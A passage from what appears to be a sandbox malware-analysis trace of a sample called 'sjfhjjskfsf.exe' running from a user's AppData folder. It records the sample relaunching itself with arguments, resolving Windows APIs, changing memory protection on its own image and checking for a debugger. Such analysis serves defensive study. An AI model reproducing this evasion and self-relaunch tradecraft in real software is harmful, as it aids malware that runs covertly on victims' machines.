[453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0099.830] NtResumeThread (in: ThreadHandle=0xf4, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0099.877] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18f360, nSize=0x104 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\appdata\\sjfhjjskfsf.exe")) returned 0x39 [0099.877] CallWindowProcW (lpPrevWndFunc=0x380004, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x114f538 [0099.877] GetTickCount () returned 0x114f538 [0099.878] wsprintfW (in: param_1=0x18f158, param_2="\"%s\" 2 %i %i" | out: param_1="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe\" 2 3772 18150712") returned 75 [0099.878] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe\" 2 3772 18150712", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x20, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18f568*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18f5b4 | out: lpCommandLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe\" 2 3772 18150712", lpProcessInformation=0x18f5b4*(hProcess=0x100, hThread=0xf8, dwProcessId=0xec4, dwThreadId=0xec8)) returned 1 [0099.913] ExitProcess (uExitCode=0x0) Process: id = "7" image_name = "sjfhjjskfsf.exe" filename = "c:\\users\\aetadzjz\\appdata\\roaming\\appdata\\sjfhjjskfsf.exe" page_root = "0x21b94000" os_pid = "0xebc" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0xeb0" cmd_line = "\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "YKYD69Q\\aETAdzjz" bitness = "32" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f18d" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 56 os_tid = 0xec0 [0099.996] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x75b90000 [0099.997] GetProcAddress (hModule=0x75b90000, lpProcName="GetModuleHandleW") returned 0x75ba34b0 [0099.997] GetProcAddress (hModule=0x75b90000, lpProcName="VirtualFree") returned 0x75ba186e [0099.997] GetProcAddress (hModule=0x75b90000, lpProcName="LoadLibraryW") returned 0x75ba492b [0099.997] GetProcAddress (hModule=0x75b90000, lpProcName="SizeofResource") returned 0x75ba5ac9 [0099.997] GetProcAddress (hModule=0x75b90000, lpProcName="GetModuleFileNameW") returned 0x75ba4950 [0099.997] GetProcAddress (hModule=0x75b90000, lpProcName="CreateFileW") returned 0x75ba3f5c [0099.998] GetProcAddress (hModule=0x75b90000, lpProcName="MultiByteToWideChar") returned 0x75ba192e [0099.998] GetProcAddress (hModule=0x75b90000, lpProcName="FlushInstructionCache") returned 0x75ba4393 [0099.998] GetProcAddress (hModule=0x75b90000, lpProcName="GetCurrentProcess") returned 0x75ba1809 [0099.998] GetProcAddress (hModule=0x75b90000, lpProcName="VirtualAlloc") returned 0x75ba1856 [0099.998] GetProcAddress (hModule=0x75b90000, lpProcName="LoadLibraryA") returned 0x75ba49d7 [0099.998] GetProcAddress (hModule=0x75b90000, lpProcName="GetModuleFileNameA") returned 0x75ba14b1 [0099.998] GetProcAddress (hModule=0x75b90000, lpProcName="GetModuleHandleA") returned 0x75ba1245 [0099.998] GetProcAddress (hModule=0x75b90000, lpProcName="VirtualProtect") returned 0x75ba435f [0099.998] GetProcAddress (hModule=0x75b90000, lpProcName="CloseHandle") returned 0x75ba1410 [0099.998] GetProcAddress (hModule=0x75b90000, lpProcName="LoadResource") returned 0x75ba594c [0099.998] GetProcAddress (hModule=0x75b90000, lpProcName="FindResourceW") returned 0x75ba5971 [0099.998] GetProcAddress (hModule=0x75b90000, lpProcName="GetProcAddress") returned 0x75ba1222 [0099.998] GetProcAddress (hModule=0x75b90000, lpProcName="GetFileSize") returned 0x75ba196e [0099.998] GetProcAddress (hModule=0x75b90000, lpProcName="LCMapStringW") returned 0x75ba17b9 [0099.998] GetProcAddress (hModule=0x75b90000, lpProcName="LCMapStringA") returned 0x75bcbc39 [0099.999] GetProcAddress (hModule=0x75b90000, lpProcName="GetStringTypeW") returned 0x75ba1946 [0099.999] GetProcAddress (hModule=0x75b90000, lpProcName="GetStringTypeA") returned 0x75bc8266 [0099.999] GetProcAddress (hModule=0x75b90000, lpProcName="HeapAlloc") returned 0x77bde026 [0099.999] GetProcAddress (hModule=0x75b90000, lpProcName="GetStartupInfoW") returned 0x75ba4d40 [0099.999] GetProcAddress (hModule=0x75b90000, lpProcName="DeleteCriticalSection") returned 0x77be45f5 [0099.999] GetProcAddress (hModule=0x75b90000, lpProcName="LeaveCriticalSection") returned 0x77bd2270 [0099.999] GetProcAddress (hModule=0x75b90000, lpProcName="EnterCriticalSection") returned 0x77bd22b0 [0099.999] GetProcAddress (hModule=0x75b90000, lpProcName="HeapFree") returned 0x75ba14c9 [0099.999] GetProcAddress (hModule=0x75b90000, lpProcName="HeapReAlloc") returned 0x77bf1f6e [0099.999] GetProcAddress (hModule=0x75b90000, lpProcName="HeapCreate") returned 0x75ba4a2d [0099.999] GetProcAddress (hModule=0x75b90000, lpProcName="Sleep") returned 0x75ba10ff [0099.999] GetProcAddress (hModule=0x75b90000, lpProcName="ExitProcess") returned 0x75ba7a10 [0099.999] GetProcAddress (hModule=0x75b90000, lpProcName="WriteFile") returned 0x75ba1282 [0099.999] GetProcAddress (hModule=0x75b90000, lpProcName="GetStdHandle") returned 0x75ba51b3 [0100.000] GetProcAddress (hModule=0x75b90000, lpProcName="SetUnhandledExceptionFilter") returned 0x75ba87c9 [0100.000] GetProcAddress (hModule=0x75b90000, lpProcName="FreeEnvironmentStringsW") returned 0x75ba51cb [0100.000] GetProcAddress (hModule=0x75b90000, lpProcName="GetEnvironmentStringsW") returned 0x75ba51e3 [0100.000] GetProcAddress (hModule=0x75b90000, lpProcName="GetCommandLineW") returned 0x75ba5223 [0100.000] GetProcAddress (hModule=0x75b90000, lpProcName="SetHandleCount") returned 0x75bacb29 [0100.000] GetProcAddress (hModule=0x75b90000, lpProcName="GetFileType") returned 0x75ba3531 [0100.000] GetProcAddress (hModule=0x75b90000, lpProcName="GetStartupInfoA") returned 0x75ba0e00 [0100.000] GetProcAddress (hModule=0x75b90000, lpProcName="TlsGetValue") returned 0x75ba11e0 [0100.000] GetProcAddress (hModule=0x75b90000, lpProcName="TlsAlloc") returned 0x75ba49ad [0100.000] GetProcAddress (hModule=0x75b90000, lpProcName="TlsSetValue") returned 0x75ba14fb [0100.000] GetProcAddress (hModule=0x75b90000, lpProcName="TlsFree") returned 0x75ba3587 [0100.000] GetProcAddress (hModule=0x75b90000, lpProcName="InterlockedIncrement") returned 0x75ba1400 [0100.000] GetProcAddress (hModule=0x75b90000, lpProcName="SetLastError") returned 0x75ba11a9 [0100.000] GetProcAddress (hModule=0x75b90000, lpProcName="GetCurrentThreadId") returned 0x75ba1450 [0100.000] GetProcAddress (hModule=0x75b90000, lpProcName="GetLastError") returned 0x75ba11c0 [0100.001] GetProcAddress (hModule=0x75b90000, lpProcName="InterlockedDecrement") returned 0x75ba13f0 [0100.001] GetProcAddress (hModule=0x75b90000, lpProcName="QueryPerformanceCounter") returned 0x75ba1725 [0100.001] GetProcAddress (hModule=0x75b90000, lpProcName="GetTickCount") returned 0x75ba110c [0100.001] GetProcAddress (hModule=0x75b90000, lpProcName="GetCurrentProcessId") returned 0x75ba11f8 [0100.001] GetProcAddress (hModule=0x75b90000, lpProcName="GetSystemTimeAsFileTime") returned 0x75ba3509 [0100.001] GetProcAddress (hModule=0x75b90000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x75ba1916 [0100.001] GetProcAddress (hModule=0x75b90000, lpProcName="TerminateProcess") returned 0x75bbd802 [0100.001] GetProcAddress (hModule=0x75b90000, lpProcName="UnhandledExceptionFilter") returned 0x75bc772f [0100.001] GetProcAddress (hModule=0x75b90000, lpProcName="IsDebuggerPresent") returned 0x75ba4a5d [0100.001] GetProcAddress (hModule=0x75b90000, lpProcName="RtlUnwind") returned 0x75bcd1c3 [0100.001] GetProcAddress (hModule=0x75b90000, lpProcName="GetCPInfo") returned 0x75ba5189 [0100.001] GetProcAddress (hModule=0x75b90000, lpProcName="GetACP") returned 0x75ba179c [0100.001] GetProcAddress (hModule=0x75b90000, lpProcName="GetOEMCP") returned 0x75bcd1a1 [0100.001] GetProcAddress (hModule=0x75b90000, lpProcName="IsValidCodePage") returned 0x75ba4493 [0100.001] GetProcAddress (hModule=0x75b90000, lpProcName="HeapSize") returned 0x77be3002 [0100.002] GetProcAddress (hModule=0x75b90000, lpProcName="GetLocaleInfoA") returned 0x75bbd5e5 [0100.002] GetProcAddress (hModule=0x75b90000, lpProcName="WideCharToMultiByte") returned 0x75ba170d [0100.002] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x75cf0000 [0100.002] GetProcAddress (hModule=0x75cf0000, lpProcName="RegOpenKeyExW") returned 0x75d0468d [0100.002] GetProcAddress (hModule=0x75cf0000, lpProcName="RegQueryValueExW") returned 0x75d046ad [0100.002] GetProcAddress (hModule=0x75cf0000, lpProcName="RegCloseKey") returned 0x75d0469d [0100.002] LoadLibraryA (lpLibFileName="PSAPI.DLL") returned 0x75d90000 [0100.002] GetProcAddress (hModule=0x75d90000, lpProcName="GetModuleInformation") returned 0x75d91420 [0100.002] GetProcAddress (hModule=0x75d90000, lpProcName="GetModuleBaseNameW") returned 0x75d9152c [0100.002] GetProcAddress (hModule=0x75d90000, lpProcName="EnumProcessModules") returned 0x75d91408 [0100.002] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x76070000 [0100.002] GetProcAddress (hModule=0x76070000, lpProcName="StrStrIW") returned 0x760846e9 [0100.002] GetProcAddress (hModule=0x76070000, lpProcName="PathFileExistsW") returned 0x760845bf [0100.002] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x40) returned 1 [0100.003] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x4) returned 1 [0100.079] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff7c | out: lpSystemTimeAsFileTime=0x18ff7c*(dwLowDateTime=0x8cf2f0a0, dwHighDateTime=0x1d66ab6)) [0100.079] GetCurrentProcessId () returned 0xebc [0100.079] GetCurrentThreadId () returned 0xec0 [0100.079] GetTickCount () returned 0x114f5f3 [0100.079] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff74 | out: lpPerformanceCount=0x18ff74*=17907625016) returned 1 [0100.079] GetStartupInfoW (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x18ff84, hStdError=0x49d4d7)) [0100.100] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x260000 [0100.101] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75b90000 [0100.101] GetProcAddress (hModule=0x75b90000, lpProcName="FlsAlloc") returned 0x75ba4f2b [0100.101] GetProcAddress (hModule=0x75b90000, lpProcName="FlsGetValue") returned 0x75ba1252 [0100.101] GetProcAddress (hModule=0x75b90000, lpProcName="FlsSetValue") returned 0x75ba4208 [0100.101] GetProcAddress (hModule=0x75b90000, lpProcName="FlsFree") returned 0x75ba359f [0100.102] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75b90000 [0100.102] GetProcAddress (hModule=0x75b90000, lpProcName="EncodePointer") returned 0x77bf0fcb [0100.139] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75b90000 [0100.139] GetProcAddress (hModule=0x75b90000, lpProcName="EncodePointer") returned 0x77bf0fcb [0100.140] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75b90000 [0100.140] GetProcAddress (hModule=0x75b90000, lpProcName="EncodePointer") returned 0x77bf0fcb [0100.140] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75b90000 [0100.140] GetProcAddress (hModule=0x75b90000, lpProcName="EncodePointer") returned 0x77bf0fcb [0100.140] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75b90000 [0100.140] GetProcAddress (hModule=0x75b90000, lpProcName="EncodePointer") returned 0x77bf0fcb [0100.140] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75b90000 [0100.140] GetProcAddress (hModule=0x75b90000, lpProcName="EncodePointer") returned 0x77bf0fcb [0100.140] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75b90000 [0100.140] GetProcAddress (hModule=0x75b90000, lpProcName="EncodePointer") returned 0x77bf0fcb [0100.141] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75b90000 [0100.141] GetProcAddress (hModule=0x75b90000, lpProcName="DecodePointer") returned 0x77be9d35 [0100.163] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x214) returned 0x2607d0 [0100.164] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75b90000 [0100.164] GetProcAddress (hModule=0x75b90000, lpProcName="DecodePointer") returned 0x77be9d35 [0100.164] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75b90000 [0100.164] GetProcAddress (hModule=0x75b90000, lpProcName="EncodePointer") returned 0x77bf0fcb [0100.164] GetProcAddress (hModule=0x75b90000, lpProcName="DecodePointer") returned 0x77be9d35 [0100.164] GetCurrentThreadId () returned 0xec0 [0100.164] GetStartupInfoA (in: lpStartupInfo=0x18fea4 | out: lpStartupInfo=0x18fea4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0100.164] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x800) returned 0x2609f0 [0100.164] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0100.164] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0100.164] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0100.164] SetHandleCount (uNumber=0x20) returned 0x20 [0100.165] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe\"" [0100.165] GetEnvironmentStringsW () returned 0x714870* [0100.165] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0xb7e) returned 0x2611f8 [0100.165] FreeEnvironmentStringsW (penv=0x714870) returned 1 [0100.165] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4a6440, nSize=0x104 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\appdata\\sjfhjjskfsf.exe")) returned 0x39 [0100.165] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x7c) returned 0x261d80 [0100.165] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0xa0) returned 0x261e08 [0100.165] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x3e) returned 0x261eb0 [0100.165] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x54) returned 0x261ef8 [0100.165] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x6e) returned 0x261f58 [0100.165] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x78) returned 0x261fd0 [0100.165] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x62) returned 0x262050 [0100.165] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x2a) returned 0x2620c0 [0100.165] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x48) returned 0x2620f8 [0100.165] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x28) returned 0x262148 [0100.165] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x1a) returned 0x262178 [0100.165] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x32) returned 0x2621a0 [0100.165] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x5a) returned 0x2621e0 [0100.165] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x2c) returned 0x262248 [0100.165] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x2e) returned 0x262280 [0100.165] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x48) returned 0x2622b8 [0100.165] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x1c) returned 0x262308 [0100.165] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x18a) returned 0x262330 [0100.165] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x7c) returned 0x2624c8 [0100.165] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x36) returned 0x262550 [0100.165] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x3a) returned 0x262590 [0100.165] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x90) returned 0x2625d8 [0100.165] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x24) returned 0x262670 [0100.165] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x30) returned 0x2626a0 [0100.165] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x36) returned 0x2626d8 [0100.166] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x48) returned 0x262718 [0100.166] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x52) returned 0x262768 [0100.166] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x3c) returned 0x2627c8 [0100.166] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x82) returned 0x262810 [0100.166] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x2e) returned 0x2628a0 [0100.166] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x28) returned 0x2628d8 [0100.166] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x1e) returned 0x262908 [0100.166] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x2c) returned 0x262930 [0100.166] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x54) returned 0x262968 [0100.166] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x52) returned 0x2629c8 [0100.166] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x26) returned 0x262a28 [0100.166] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x24) returned 0x262a58 [0100.166] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x3c) returned 0x262a88 [0100.166] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x24) returned 0x262ad0 [0100.166] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x30) returned 0x262b00 [0100.166] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x8c) returned 0x262b38 [0100.166] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x2611f8 | out: hHeap=0x260000) returned 1 [0100.167] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x80) returned 0x262bd0 [0100.167] GetLastError () returned 0x0 [0100.167] SetLastError (dwErrCode=0x0) [0100.167] GetLastError () returned 0x0 [0100.167] SetLastError (dwErrCode=0x0) [0100.167] GetLastError () returned 0x0 [0100.167] SetLastError (dwErrCode=0x0) [0100.167] GetACP () returned 0x4e4 [0100.167] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x220) returned 0x262c58 [0100.167] GetLastError () returned 0x0 [0100.167] SetLastError (dwErrCode=0x0) [0100.167] IsValidCodePage (CodePage=0x4e4) returned 1 [0100.167] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fe84 | out: lpCPInfo=0x18fe84) returned 1 [0100.167] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f950 | out: lpCPInfo=0x18f950) returned 1 [0100.273] GetLastError () returned 0x0 [0100.273] SetLastError (dwErrCode=0x0) [0100.273] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x18f8e0 | out: lpCharType=0x18f8e0) returned 1 [0100.273] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0100.273] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0100.273] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f964 | out: lpCharType=0x18f964) returned 1 [0100.273] GetLastError () returned 0x0 [0100.273] SetLastError (dwErrCode=0x0) [0100.273] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0100.273] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0100.273] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿꓺԺJĀ") returned 256 [0100.273] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿꓺԺJĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0100.273] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿꓺԺJĀ", cchSrc=256, lpDestStr=0x18f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0100.273] WideCharToMultiByte (in: CodePage=0x4e4, 